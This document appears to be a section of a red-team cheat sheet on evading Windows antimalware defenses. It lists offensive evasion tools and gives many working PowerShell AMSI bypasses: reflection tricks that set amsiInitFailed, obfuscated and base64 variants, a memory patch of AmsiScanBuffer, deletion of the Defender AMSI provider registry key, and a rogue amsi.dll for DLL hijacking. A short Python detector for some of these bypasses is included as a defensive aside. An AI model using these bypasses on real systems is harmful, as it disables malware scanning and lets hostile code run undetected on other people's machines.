# 5 Installation

## Tooling

| Name | Description | URL |
| --- | --- | --- |
| AMSI Bypass Powershell | This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods I found on different blog posts. | https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell |
| AMSI.fail | AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. | http://amsi.fail |
| AmsiHook | AmsiHook is a project I created to figure out a bypass to AMSI via function hooking. | https://github.com/tomcarver16/AmsiHook |
| AmsiScanBufferBypass | Bypass AMSI by patching AmsiScanBuffer. | https://github.com/rasta-mouse/AmsiScanBufferBypass |
| AMSITrigger v3 | The Hunt for Malicious Strings. | https://github.com/RythmStick/AMSITrigger |
| DefenderCheck | Identifies the bytes that Microsoft Defender flags on. | https://github.com/matterpreter/DefenderCheck |
| Donut | Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters. | https://github.com/TheWover/donut |
| EXE_to_DLL | Converts an EXE into a DLL. | https://github.com/hasherezade/exe_to_dll |
| Freeze | Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods. | https://github.com/optiv/Freeze |
| hoaxshell | An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. | https://github.com/t3l3machus/hoaxshell |
| Invoke-Obfuscation | PowerShell Obfuscator. | https://github.com/danielbohannon/Invoke-Obfuscation |
| mimikatz Obfuscator | This script downloads and slightly "obfuscates" the mimikatz project. | https://gist.github.com/imaibou/92feba3455bf173f123fbe50bbe80781 |
| Nimcrypt2 | .NET, PE, & Raw Shellcode Packer/Loader Written in Nim. | https://github.com/icyguider/Nimcrypt2 |
| NimHollow | Nim implementation of Process Hollowing using syscalls (PoC). | https://github.com/snovvcrash/NimHollow |
| NimlineWhispers2 | A tool for converting SysWhispers2 syscalls for use with Nim projects. | https://github.com/ajpc500/NimlineWhispers2 |
| ntlm_theft | A tool for generating multiple types of NTLMv2 hash theft files. | https://github.com/Greenwolf/ntlm_theft |
| Offensive-C-Sharp | I wrote these while learning AD pentesting and Windows hacking. | https://github.com/winsecurity/Offensive-C-Sharp |
| OffensiveNim | Experiments in weaponizing Nim for implant development and general offensive operations. | https://github.com/0xsyr0/OffensiveNim |
| OffensivePipeline | OffensivePipeline allows you to download, compile (without Visual Studio) and obfuscate C# tools for Red Team exercises. | https://github.com/Aetsu/OffensivePipeline |
| OffensiveRust | Rust Weaponization for Red Team Engagements. | https://github.com/trickster0/OffensiveRust |
| PSByPassCLM | Bypass for PowerShell Constrained Language Mode. | https://github.com/padovah4ck/PSByPassCLM |
| ScareCrow | Payload creation framework designed around EDR bypass. | https://github.com/optiv/ScareCrow |
| Simple Injector | A simple injector that uses LoadLibraryA. | https://github.com/tomcarver16/SimpleInjector |
| SysWhispers | SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls. | https://github.com/m57/SysWhispers |
| Veil | Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. | https://github.com/Veil-Framework/Veil |

## AMSI Bypass

### Test String

```powershell
PS C:\> $str = 'amsiinitfailed'
```

### Simple Bypass

```powershell
PS C:\> $str = 'ams' + 'ii' + 'nitf' + 'ailed'
```

### Obfuscated Bypass Techniques

```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
PS C:\> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

### Bypass on Windows 11

https://github.com/senzee1984/Amsi_Bypass_In_2023

```powershell
PS C:\> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)
PS C:\> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);$ptr = [System.IntPtr]::Add([System.IntPtr]$g, 0x8);$buf = New-Object byte[](8);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 8)
```

### PowerShell Downgrade

```powershell
PS C:\> powershell -version 2
```

### Fabian Mosch / Matt Graeber Bypass

```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

### Base64 Encoded

```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
```
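The bypasses above (the split-string variant and the base64-encoded variants) all rebuild the same identifiers, `AmsiUtils` and `amsiInitFailed`, from fragments so that the literal strings never appear in the script. The following detection helper is an added example, not part of this cheat sheet or of any of the listed tools: it undoes both tricks (joins `'a' + 'b'` literals and decodes `FromBase64String` arguments as UTF-16LE, as `[Text.Encoding]::Unicode` does) and reports which AMSI identifiers surface. The indicator list and sample scripts are constructed for the example.

```python
import base64
import re
from typing import Dict, List

# Identifiers reconstructed by the AMSI tampering one-liners above (constructed list);
# a script that rebuilds one of these from fragments deserves a closer look.
AMSI_INDICATORS = ("amsiutils", "amsiinitfailed", "amsiscanbuffer",
                   "amsicontext", "amsisession")

B64_ARG_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
QUOTE_JOIN_RE = re.compile(r"'\s*\+\s*'")  # the ' + ' between two adjacent literals

def decode_b64_fragments(script: str) -> List[str]:
    """Decode every FromBase64String('...') argument as UTF-16LE, which is what
    [Text.Encoding]::Unicode.GetString() yields in the obfuscated one-liners."""
    decoded = []
    for match in B64_ARG_RE.finditer(script):
        try:
            decoded.append(base64.b64decode(match.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 / not a UTF-16 string: ignore this fragment
    return decoded

def join_split_literals(script: str) -> str:
    """Collapse 'ams' + 'ii' + 'nitf' + 'ailed' into 'amsiinitfailed'."""
    return QUOTE_JOIN_RE.sub("", script)

def amsi_tamper_indicators(script: str) -> List[str]:
    """Return the AMSI identifiers visible once the script text is normalised."""
    normalised = join_split_literals(script) + " " + " ".join(decode_b64_fragments(script))
    normalised = normalised.lower()
    return sorted(ind for ind in AMSI_INDICATORS if ind in normalised)

# Constructed samples: two lines modelled on the bypasses above and one benign command.
SAMPLES: Dict[str, str] = {
    "split": "$str = 'ams' + 'ii' + 'nitf' + 'ailed'",
    "base64": "[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode"
              ".GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField("
              "$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
              "'YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)",
    "benign": "Get-Process | Where-Object { $_.Name -eq 'explorer' }",
}

def scan_samples() -> Dict[str, List[str]]:
    """Run the indicator check over every constructed sample."""
    return {name: amsi_tamper_indicators(text) for name, text in SAMPLES.items()}

if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name}: {hits or 'clean'}")
```

The `-f` format-string variant further down the page (`'{0}m{1}{2}' -f $w,$c,$m`) is not undone by this normaliser; catching it needs a small evaluator for PowerShell format operators on literals.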

### Hooking

https://github.com/tomcarver16/SimpleInjector

https://github.com/tomcarver16/AmsiHook

```powershell
PS C:\> .\SimpleInjector.exe powershell.exe .\AMSIHook.dll
```

### Memory Patching

https://github.com/rasta-mouse/AmsiScanBufferBypass

The patch makes AmsiScanBuffer always return AMSI_RESULT_CLEAN; the patch bytes are shown in the following line.

```csharp
static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
```

#### Load and Execute the DLL

```powershell
[System.Reflection.Assembly]::LoadFile("C:\Users\pentestlab\ASBBypass.dll")
[Amsi]::Bypass()
```

The tool AMSITrigger v3 can be used to identify the strings in a script that trigger a detection when they are passed to AmsiScanBuffer.

https://github.com/RythmStick/AMSITrigger

```powershell
PS C:\> .\AmsiTrigger_x64.exe -i .\ASBBypass.ps1
```

Obfuscating the flagged strings within the script evades AMSI.

```powershell
${_/==\_/\__/===\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')))
Add-Type ${_/==\_/\__/===\_/}
${__/=\/==\/\_/=\_/} = [Win32]::LoadLibrary("am" + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBpAC4AZABsAGwA'))))
${___/====\__/=====} = [Win32]::GetProcAddress(${__/=\/==\/\_/=\_/}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGEAbgA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgB1AGYAZgBlAHIA'))))
${/==\_/=\/\__/\/\/} = 0
[Win32]::VirtualProtect(${___/====\__/=====}, [uint32]5, 0x40, [ref]${/==\_/=\/\__/\/\/})
${_/\__/=\/\___/==\} = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy(${_/\__/=\/\___/==\}, 0, ${___/====\__/=====}, 6)
```

### Forcing an Error

Setting amsiInitFailed forces AMSI into a failed state, so no scan is initiated for the current process.

```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

Splitting the signatured strings into variables and reassembling them with a format string can also evade AMSI.

```powershell
$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))
$field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')
$field.SetValue($null,$true)
```

Another option is to trigger the error condition legitimately so that PowerShell sets the flag itself. This bypass allocates a memory region for amsiContext and sets amsiSession to null, which causes the scan call to fail.

```powershell
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
```

An obfuscated version of this bypass can be found on AMSI.fail.

```powershell
$fwi=[System.Runtime.InteropServices.Marshal]::AllocHGlobal((9076+8092-8092));[Ref].Assembly.GetType("System.Management.Automation.$([cHAr](65)+[cHaR]([byTe]0x6d)+[ChaR]([ByTe]0x73)+[CHaR]([BYte]0x69)+[CHaR](85*31/31)+[cHAR]([byte]0x74)+[cHAR](105)+[cHar](108)+[Char](115+39-39))").GetField("$('àmsìSessîõn'.NoRMALiZe([char](70+54-54)+[cHaR](111)+[cHar](114+24-24)+[chaR](106+3)+[chAR](68+26-26)) -replace [CHAR](24+68)+[chaR]([BytE]0x70)+[CHar]([bYtE]0x7b)+[cHAr](77+45-45)+[chaR](62+48)+[CHAR](125*118/118))", "NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.$([cHAr](65)+[cHaR]([byTe]0x6d)+[ChaR]([ByTe]0x73)+[CHaR]([BYte]0x69)+[CHaR](85*31/31)+[cHAR]([byte]0x74)+[cHAR](105)+[cHar](108)+[Char](115+39-39))").GetField("$([char]([bYtE]0x61)+[ChaR]([BYte]0x6d)+[Char](55+60)+[chAr](105+97-97)+[CHAr]([byTe]0x43)+[ChaR](111+67-67)+[char]([BytE]0x6e)+[cHaR]([bYtE]0x74)+[cHAr](101)+[CHar](120)+[cHAR](116))", "NonPublic,Static").SetValue($null, [IntPtr]$fwi);
```

### Registry Key Modification

Provider GUID for Windows Defender:

```
HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}
```

Removing the key stops the AMSI provider from performing AMSI inspection, which evades the control. Note that this requires elevated rights.

```powershell
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```

### DLL Hijacking

This requires creating a non-legitimate amsi.dll and placing it in the same folder as the 64 Bit version of PowerShell. Alternatively, the PowerShell executable can be copied into a writeable directory.

```cpp
#include "pch.h"
#include "iostream"

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        LPCWSTR appName = NULL;
        typedef struct HAMSICONTEXT {
            DWORD       Signature;            // "AMSI" or 0x49534D41
            PWCHAR      AppName;           // set by AmsiInitialize
            DWORD       Antimalware;       // set by AmsiInitialize
            DWORD       SessionCount;      // increased by AmsiOpenSession
        } HAMSICONTEXT;
        typedef enum AMSI_RESULT {
            AMSI_RESULT_CLEAN,
            AMSI_RESULT_NOT_DETECTED,
            AMSI_RESULT_BLOCKED_BY_ADMIN_START,
            AMSI_RESULT_BLOCKED_BY_ADMIN_END,
            AMSI_RESULT_DETECTED
        } AMSI_RESULT;

        typedef struct HAMSISESSION {
            DWORD test;
        } HAMSISESSION;

        typedef struct r {
            DWORD r;
        };

        void AmsiInitialize(LPCWSTR appName, HAMSICONTEXT * amsiContext);
        void AmsiOpenSession(HAMSICONTEXT amsiContext, HAMSISESSION * amsiSession);
        void AmsiCloseSession(HAMSICONTEXT amsiContext, HAMSISESSION amsiSession);
        void AmsiResultIsMalware(r);
        void AmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT * result);
        void AmsiScanString(HAMSICONTEXT amsiContext, LPCWSTR string, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT * result);
        void AmsiUninitialize(HAMSICONTEXT amsiContext);
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

```
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
```

Source: https://pentestlaboratories.com/tag/obfuscation/

## Windows Defender

Windows Defender appears to flag the following function declaration in Visual Basic scripts.

```vb
Private Declare PtrSafe Function VirtualProtectEx Lib "kernel32" ( _
    ByVal hProcess As LongPtr, _
    ByVal lpAddress As LongPtr, _
    ByVal dwSize As Long, _
    ByVal flNewProtect As Long, _
    ByRef lpflOldProtect As LongPtr _
) As Long
```

It also flags the following functions:

- CreateProcess
- VirtualAllocEx
- GetProcAddress
- LoadLibrary
